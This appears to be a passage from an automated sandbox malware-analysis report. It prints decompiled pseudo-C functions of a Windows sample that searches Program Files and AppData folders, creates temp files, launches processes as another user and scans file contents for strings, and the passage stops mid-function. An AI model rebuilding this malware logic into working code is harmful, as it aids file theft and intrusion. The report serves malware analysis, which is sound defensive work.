    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00414569
      • Part of subcall function 0041BB58: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
      • Part of subcall function 0041BB58: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
      • Part of subcall function 0041BB58: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
      • Part of subcall function 0041BB58: Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
      • Part of subcall function 0041BB58: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
      • Part of subcall function 0041BB58: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: 3d8e89510d9a6c78c59bd0a2bd641de29b36c892ffe8607c5642eff911865b28
    • Instruction ID: 10eae88adfd1eaa7f7b1e2b22cd4cc7ff9f5ec3795549b327acee0e2604537d0
    • Opcode Fuzzy Hash: 3d8e89510d9a6c78c59bd0a2bd641de29b36c892ffe8607c5642eff911865b28
    • Instruction Fuzzy Hash: 2E11A071901228BBDB209B95DC09FDF7F79EF81304F00405AB604A6180D7785B85CBE9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00414E3A(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v60;
    				char _v580;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v60;
    				E004159A4(0x95, _t32);
    				_v16 = _t32;
    				_v28 = 0x26; // CSIDL_PROGRAM_FILES
    				_v24 = 0x1a; // CSIDL_APPDATA
    				_v20 = 0x23; // CSIDL_COMMON_APPDATA
    				E004164D4( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v580;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E0041BB58( &_v580,  &_v16, _t37, 1, 2, E00414BAB,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E00416421(_v12);
    				}
    				return E0041252D(_t29, _v12, 0xcb);
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00414E8A
      • Part of subcall function 0041BB58: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
      • Part of subcall function 0041BB58: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
      • Part of subcall function 0041BB58: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
      • Part of subcall function 0041BB58: Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
      • Part of subcall function 0041BB58: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
      • Part of subcall function 0041BB58: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: 0e142752edf9faea051dfd1475f9757745264393bdf95e09941ae8ea1e8dbdf1
    • Instruction ID: ad54cb6dfae81f3488c63cb24e4edfd813e54fb3884ebddcf43ce1e205ebdd58
    • Opcode Fuzzy Hash: 0e142752edf9faea051dfd1475f9757745264393bdf95e09941ae8ea1e8dbdf1
    • Instruction Fuzzy Hash: B5117075901228BADB209B96DC49FDFBF78EF81314F00405AF609A7180D3785AC5CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00406D97(void* __eflags) {
    				signed int _v8;
    				char _v20;
    				char _v44;
    				char _v92;
    				void* __edi;
    				void* __esi;
    				void* _t17;
    				CHAR* _t27;
    				intOrPtr* _t28;
    				WCHAR* _t30;
    				struct HINSTANCE__* _t31;
    
    				_t30 =  &_v44;
    				E004159A4(0xe3, _t30);
    				_t31 = GetModuleHandleW(_t30);
    				if(_t31 != 0) {
    					_t27 =  &_v20;
    					E0041596E(0xe4, _t27);
    					_t28 = GetProcAddress(_t31, _t27);
    					if(_t28 == 0) {
    						L4:
    						_t17 = 0;
    						L6:
    						return _t17;
    					}
    					_v8 = _v8 & 0x00000000;
    					_t32 =  &_v92;
    					E004159A4(0xd5,  &_v92);
    					_push(0x1e6);
    					_push("0xB268B1AD");
    					if(E0041718F( &_v8, _t32, 0x1050809) > 0) {
    						 *_t28(0, _v8, "#", 0x10040);
    						E00416421(_v8);
    						_t17 = 1;
    						goto L6;
    					}
    					goto L4;
    				}
    				return 0;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 00406DAE
    • GetProcAddress.KERNEL32(00000000,?), ref: 00406DD0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: 0xB268B1AD
    • API String ID: 1646373207-1532168515
    • Opcode ID: e5bee13c06fd1d6849110fb696735ec403fb43aaaa9d4694e8bdb8134a290847
    • Instruction ID: 444c42f79a14df9c0cf1b00b2653f1ed534b3c6cb381334ca6a16cfdf4d7cb6b
    • Opcode Fuzzy Hash: e5bee13c06fd1d6849110fb696735ec403fb43aaaa9d4694e8bdb8134a290847
    • Instruction Fuzzy Hash: 2E01F57AA40714B7CB1166A6CC06BDF3B2CDF80755F11006AFD01FB284DA7CCA1595E9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00406AB8(void* __ecx, WCHAR* __edi, void* __esi, signed int _a4) {
    				char _v104;
    				char _v154;
    				char _v174;
    				char _v194;
    				char _v592;
    				signed int _t13;
    				int _t15;
    				WCHAR* _t18;
    				char* _t21;
    				WCHAR* _t22;
    				void* _t23;
    
    				_t23 = __esi;
    				_t22 = __edi;
    				 *__edi = 0;
    				E00406A66(__ecx,  &_v592);
    				_t13 = _a4;
    				if(_t13 == 0) {
    					L6:
    					_t21 =  &_v174;
    					goto L7;
    				} else {
    					_t13 = _t13 - 1;
    					if(_t13 == 0) {
    						_t21 =  &_v194;
    						L7:
    						_t18 = 0x4229a0;
    						goto L8;
    					} else {
    						_t13 = _t13 - 1;
    						if(_t13 == 0) {
    							goto L6;
    						} else {
    							_t15 = _t13 - 1;
    							if(_t15 == 0) {
    								_t18 = L"SOFTWARE\\Microsoft";
    								_t21 =  &_v154;
    								L8:
    								_push(_t23);
    								_t15 = E0041662C(_t13 | 0xffffffff, _t21,  &_v104, 0, 0x32);
    								if(_t15 != 0) {
    									_t15 = E0041BCB4( &_v104, _t22, _t18);
    									if(_t15 == 0) {
    										L12:
    										_t15 = 0;
    										 *_t22 = 0;
    									} else {
    										if(_a4 == 0) {
    											_t15 = PathRenameExtensionW(_t22, L".dat");
    											if(_t15 == 0) {
    												goto L12;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t15;
    			}

    APIs
    • PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ExtensionPathRename
    • String ID: .dat$SOFTWARE\Microsoft
    • API String ID: 3337224433-47915998
    • Opcode ID: 7346056e7a3c2a0fba0c0708040a9bca038319059d625d2debf8e60216a4544a
    • Instruction ID: 6a00dad349256d433c9dfd404ca64af83f46a783f60c26087ee0cbca6850d75d
    • Opcode Fuzzy Hash: 7346056e7a3c2a0fba0c0708040a9bca038319059d625d2debf8e60216a4544a
    • Instruction Fuzzy Hash: 8101D2702002199ACB20EBB4C840BEBB778EF01340F51807BA906F21C0E778AE94DA5E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0041B7A6(intOrPtr _a4, intOrPtr _a8) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t12;
    				void* _t20;
    				void* _t21;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t20 = 0;
    				while(1) {
    					_push(_a4);
    					_push(E0041775A());
    					_push(L"tmp");
    					_t19 =  &_v1044;
    					_t12 = E00417114(_t11, 0x104,  &_v1044, L"%s%08x.%s");
    					_t21 = _t21 + 0x10;
    					if(_t12 == 0xffffffff) {
    						goto L6;
    					}
    					if(E0041BCB4(_t19, _a8,  &_v524) == 0 || E0041B5DA(_a8, 0, 0) == 0) {
    						_t20 = _t20 + 1;
    						if(_t20 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}

    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 0041B7BD
      • Part of subcall function 0041775A: GetTickCount.KERNEL32 ref: 0041775A
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
      • Part of subcall function 0041B5DA: CreateFileW.KERNEL32(00417EFB,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B5F4
      • Part of subcall function 0041B5DA: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B617
      • Part of subcall function 0041B5DA: CloseHandle.KERNEL32(00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B624
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
    • String ID: %s%08x.%s$tmp
    • API String ID: 3395140874-234517578
    • Opcode ID: 0ba05265954f171b37d69a34f707c3ba3af3ad0a2de1d9a09da13306e5a98e78
    • Instruction ID: 7c5fff95fd9387a5440838fff514b9380cb5b80794eb81717ca26ee4bbc93f84
    • Opcode Fuzzy Hash: 0ba05265954f171b37d69a34f707c3ba3af3ad0a2de1d9a09da13306e5a98e78
    • Instruction Fuzzy Hash: 4E01267114021826EA203A208D42BFF7728DB41B54F1041B3FE25B61D2C3798DC6C6EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00419FF5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v524;
    				void* __esi;
    				WCHAR* _t17;
    				intOrPtr _t25;
    				int _t27;
    
    				_t27 = 0;
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041B785( &_v524) != 0) {
    					_t17 = PathFindFileNameW( &_v524);
    					_t25 = _a4;
    					E004165A0(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
    					E0041645D(_t25, "?T", 2);
    					 *((char*)(_t25 + 2)) = 0x5c;
    					_t27 = 1;
    				}
    				return _t27;
    			}

    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0041A017
      • Part of subcall function 0041B785: SetFileAttributesW.KERNEL32(00000080,00000080,0040C774,?), ref: 0041B78E
      • Part of subcall function 0041B785: DeleteFileW.KERNEL32(?), ref: 0041B798
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 0041A039
      • Part of subcall function 004165A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00417298,00000000,00000000,00000000,004165FD,00000000,00000000,00000000,?,00000000), ref: 004165BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: 2e14a54aa504a7c25fa81943960b87abd01cf3a2ebc93f3ed310c45bfc680ef0
    • Instruction ID: 08eddc06e61a59b83702d710fe7114b423ef6bde4a38add2f9f4f3b96c44e801
    • Opcode Fuzzy Hash: 2e14a54aa504a7c25fa81943960b87abd01cf3a2ebc93f3ed310c45bfc680ef0
    • Instruction Fuzzy Hash: DE01DB72A0021467CB209BA8DC49FC777AC9F45755F0402527A69F31D2D674E9448694
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0040E6CE(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
    				void* _t13;
    				void** _t24;
    				void* _t27;
    
    				_t13 = _a4(_a8,  &_a8);
    				if(_t13 != 0) {
    					_t24 = E00419B10(__ecx, _a8);
    					if(_t24 != 0) {
    						if(EqualSid( *_t24, _a12) != 0) {
    							_t27 = _a8;
    							if(E0041718F( &_a4, L"\"%s\"", _a16) > 0) {
    								E00417D43(_t27, _a4);
    								E00416421(_a4);
    							}
    						}
    						E00416421(_t24);
    					}
    					return CloseHandle(_a8);
    				}
    				return _t13;
    			}

    APIs
      • Part of subcall function 00419B10: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,00417A5A,?,?,?,004065BC,000000FF,00422950), ref: 00419B29
      • Part of subcall function 00419B10: GetLastError.KERNEL32(?,?,00417A5A,?,?,?,004065BC,000000FF,00422950,?,?,00000000), ref: 00419B2F
      • Part of subcall function 00419B10: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00417A5A,?,?,?,004065BC,000000FF,00422950), ref: 00419B55
    • EqualSid.ADVAPI32(00000000,0040E847,?,0040E847,?,?,00000000), ref: 0040E6F3
      • Part of subcall function 00417D43: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417D54
      • Part of subcall function 00417D43: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417D73
      • Part of subcall function 00417D43: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D7F
      • Part of subcall function 00417D43: CreateProcessAsUserW.ADVAPI32(?,00000000,0040E722,00000000,00000000,00000000,0040E722,0040E722,00000000,?,?,?,00000000,00000044), ref: 00417DF0
      • Part of subcall function 00417D43: CloseHandle.KERNEL32(?), ref: 00417E03
      • Part of subcall function 00417D43: CloseHandle.KERNEL32(?), ref: 00417E08
      • Part of subcall function 00417D43: FreeLibrary.KERNEL32(?), ref: 00417E1F
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    • CloseHandle.KERNEL32(?,?,0040E847,?,?,00000000), ref: 0040E734
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
    • String ID: "%s"
    • API String ID: 4035272744-3297466227
    • Opcode ID: cbbd66676f0c9926ba23e0351f81f764ec975333b75f8e8fc24c2e06a2cd1ef5
    • Instruction ID: 1c54e54367483d5df6a15ad46610ffb137875d47fb8a70796a7fb94628ec302f
    • Opcode Fuzzy Hash: cbbd66676f0c9926ba23e0351f81f764ec975333b75f8e8fc24c2e06a2cd1ef5
    • Instruction Fuzzy Hash: 0DF08135100109BBCF016F62EC45DDF3F29EF84391B10843AFD08AA161DB39DA60DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004184EA(intOrPtr __eax, void* __eflags) {
    				long _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char* _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v56;
    				void* __edi;
    				intOrPtr _t26;
    
    				_t26 = 0;
    				_v56 = 0x101;
    				_v52 = 0;
    				_v48 = __eax;
    				_v44 = E00418469();
    				_v40 = "http://www.google.com/webhp";
    				_v36 = 0;
    				_v32 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0x80000;
    				_v12 = 0;
    				_v8 = GetTickCount();
    				if(E00418337( &_v56, 0) != 0) {
    					_t26 = GetTickCount() - _v8;
    				}
    				E00416421(_v44);
    				return _t26;
    			}

    APIs
      • Part of subcall function 00418469: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0041847A
      • Part of subcall function 00418469: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0041848D
      • Part of subcall function 00418469: FreeLibrary.KERNEL32(?), ref: 004184DF
    • GetTickCount.KERNEL32 ref: 0041852F
      • Part of subcall function 00418337: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0041838B
      • Part of subcall function 00418337: InternetCloseHandle.WININET(00000000), ref: 00418424
    • GetTickCount.KERNEL32 ref: 00418541
    Strings
    • http://www.google.com/webhp, xrefs: 0041850F
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
    • String ID: http://www.google.com/webhp
    • API String ID: 2673491915-2670330958
    • Opcode ID: 35b7e05fa67d69dacd93531c99f0a69a09a945f26311f9131be05dc26fbb8216
    • Instruction ID: cc6d0f838ea9cfcd110650bcb5f79b12505634ac5046a745f05f73d80ac47241
    • Opcode Fuzzy Hash: 35b7e05fa67d69dacd93531c99f0a69a09a945f26311f9131be05dc26fbb8216
    • Instruction Fuzzy Hash: 1701C4B1D11228AACB009FE9D9454DEBBB8AF08748F10406BE800B7210D7B45A458B98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041775A() {
    				unsigned int __esi;
    				signed int _t25;
    				signed int _t61;
    				signed int* _t65;
    				signed int _t66;
    
    				if(GetTickCount() !=  *0x423568) {
    					__ecx = 0;
    					 *0x423568 = __eax;
    					 *0x423570 = __eax;
    					__ecx = 1;
    					__eax = 0x423570;
    					do {
    						__edx =  *__eax;
    						__edx = __edx >> 0x1e;
    						__edx >> 0x0000001e ^ __edx = (__edx >> 0x0000001e ^ __edx) * 0x6c078965;
    						__esi = (__edx >> 0x0000001e ^ __edx) * 0x6c078965 + __ecx;
    						__eax[1] = (__edx >> 0x0000001e ^ __edx) * 0x6c078965 + __ecx;
    						__eax =  &(__eax[1]);
    						__ecx = __ecx + 1;
    					} while (__eax < 0x423f2c);
    					 *0x423f3c = __ecx;
    				}
    				_t25 =  *0x423f3c;
    				if(_t25 >= 0x270) {
    					_t66 = 0;
    					do {
    						_t61 = _t66;
    						_t66 = _t66 + 1;
    						0x423570[_t61] = (( *(0x423574 + _t61 * 4) ^ 0x423570[_t61]) & 0x7fffffff ^ 0x423570[_t61]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x423574 + _t61 * 4) ^ 0x423570[_t61]) & 0x7fffffff ^ 0x423570[_t61]) & 0x00000001) * 4) ^  *(0x423ba4 + _t61 * 4);
    					} while (_t66 < 0xe3);
    					if(_t66 < 0x26f) {
    						_t65 =  &(0x423570[_t66]);
    						do {
    							 *_t65 =  *(0x4223a0 + ((( *_t65 ^ _t65[1]) & 0x7fffffff ^  *_t65) & 0x00000001) * 4) ^  *(_t65 - 0x38c) ^ (( *_t65 ^ _t65[1]) & 0x7fffffff ^  *_t65) >> 0x00000001;
    							_t65 =  &(_t65[1]);
    						} while (_t65 < 0x423f2c);
    					}
    					 *0x423f2c = (( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) >> 0x00000001 ^  *(0x4223a0 + ((( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) & 0x00000001) * 4) ^  *0x423ba0;
    					_t25 = 0;
    				}
    				 *0x423f3c = _t25 + 1;
    				return (0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CountTick
    • String ID: ,?B$p5B
    • API String ID: 536389180-53248244
    • Opcode ID: 6f717adb3fb122f250c544fd4b7140c28e61e267eab53f0ba6e6512e92fb66ca
    • Instruction ID: 32e6a462c1c3d9d1d55db56c81ca5dca802e5fae6257ca50784b646dc323a44a
    • Opcode Fuzzy Hash: 6f717adb3fb122f250c544fd4b7140c28e61e267eab53f0ba6e6512e92fb66ca
    • Instruction Fuzzy Hash: 73E01B72E18120AF9328CF19B54545576F4E649345356827BE40EE7371E73C99C38F8C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A4DD(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
    				void* _t9;
    
    				if( *__esi < 0x40) {
    					if(_a8 == 0) {
    						L6:
    						return 1;
    					}
    					_t2 =  &_a12; // 0x422838
    					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
    					if(_t9 == 0) {
    						L2:
    						return 0;
    					}
    					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
    					 *__esi =  *__esi + 1;
    					goto L6;
    				}
    				SetLastError(0x9b);
    				goto L2;
    			}

    APIs
    • SetLastError.KERNEL32(0000009B,00406D57,00000000,004159EE,00000000,00422838,00000000,00000104,74B5F560,00000000), ref: 0041A4E7
    • CreateThread.KERNEL32 ref: 0041A50A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateErrorLastThread
    • String ID: 8(B
    • API String ID: 1689873465-280421164
    • Opcode ID: 81a221aa79ac654a3d13ddf4a8d736319d9eb13d262342f35a50137733f20339
    • Instruction ID: 6f7e4ad42fc3e77c629095f89d8deef1d19042d5eadc55cffe25330061af76c1
    • Opcode Fuzzy Hash: 81a221aa79ac654a3d13ddf4a8d736319d9eb13d262342f35a50137733f20339
    • Instruction Fuzzy Hash: BDE09275108382BAEB215F24AB08B6ABFD16F19B01F50485EF3C1651E1C3B940A8DB2B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00414BAB(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				char _v524;
    				char _v576;
    				char _v580;
    				char _v588;
    				intOrPtr _v608;
    				char _v612;
    				char _v620;
    				char _v628;
    				char _v632;
    				char* _v640;
    				signed int _v644;
    				char* _v648;
    				char** _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				char* _v664;
    				char* _v668;
    				char* _v672;
    				char* _v676;
    				void* __edi;
    				void* __esi;
    				signed int _t82;
    				char* _t83;
    				intOrPtr _t85;
    				char** _t101;
    				char* _t112;
    				char* _t121;
    				char* _t122;
    				void* _t123;
    				char* _t126;
    				char* _t127;
    				char* _t156;
    				void* _t157;
    				signed int _t166;
    				char* _t167;
    				char** _t168;
    				intOrPtr _t170;
    				char* _t171;
    				signed int _t172;
    				void* _t174;
    
    				_t174 = (_t172 & 0xfffffff8) - 0x294;
    				if(E0041BCB4( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L31:
    					return 1;
    				}
    				_t177 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_push( &_v524);
    					_t82 = 2;
    					_t83 = E0041B63F(_t82,  &_v524,  &_v612);
    					__eflags = _t83;
    					if(_t83 == 0) {
    						goto L31;
    					}
    					_t85 = E00416CBC(_v608,  &_v652, _v612, 1, 0);
    					_v660 = _t85;
    					__eflags = _t85 - 0xffffffff;
    					if(_t85 == 0xffffffff) {
    						L30:
    						E0041B6E7( &_v612);
    						goto L31;
    					}
    					_v640 = E004163F1(0x622);
    					E0041596E(0x91,  &_v588);
    					E0041596E(0x92,  &_v628);
    					E0041596E(0x93,  &_v620);
    					E0041596E(0x94,  &_v576);
    					__eflags = _v640;
    					if(_v640 == 0) {
    						L29:
    						E00416421(_v640);
    						E0041643D(_v652, _v656);
    						goto L30;
    					}
    					_v644 = 0;
    					__eflags = _v648;
    					if(_v648 > 0) {
    						do {
    							_t166 = _v644;
    							_t101 = _v652;
    							__eflags =  *(_t101 + _t166 * 4);
    							if( *(_t101 + _t166 * 4) == 0) {
    								goto L28;
    							}
    							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
    							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
    							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
    							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
    							__eflags = _v676;
    							_t167 = _t112;
    							if(_v676 == 0) {
    								goto L28;
    							}
    							__eflags = _v672;
    							if(_v672 == 0) {
    								goto L28;
    							}
    							__eflags = _t167;
    							if(_t167 == 0) {
    								goto L28;
    							}
    							_v676 =  &(_v676[8]);
    							_v672 =  &(_v672[6]);
    							_t168 =  &(_t167[0xa]);
    							_v652 = _t168;
    							E00414B91();
    							E00414B91();
    							E00414B91();
    							__eflags = _t156;
    							if(_t156 == 0) {
    								L15:
    								_t157 = 0x15;
    								L16:
    								__eflags =  *_v676;
    								if( *_v676 == 0) {
    									goto L28;
    								}
    								__eflags =  *_v672;
    								if( *_v672 == 0) {
    									goto L28;
    								}
    								_t121 =  *_t168;
    								__eflags = _t121;
    								if(_t121 == 0) {
    									goto L28;
    								}
    								__eflags = _t121 - 0x30;
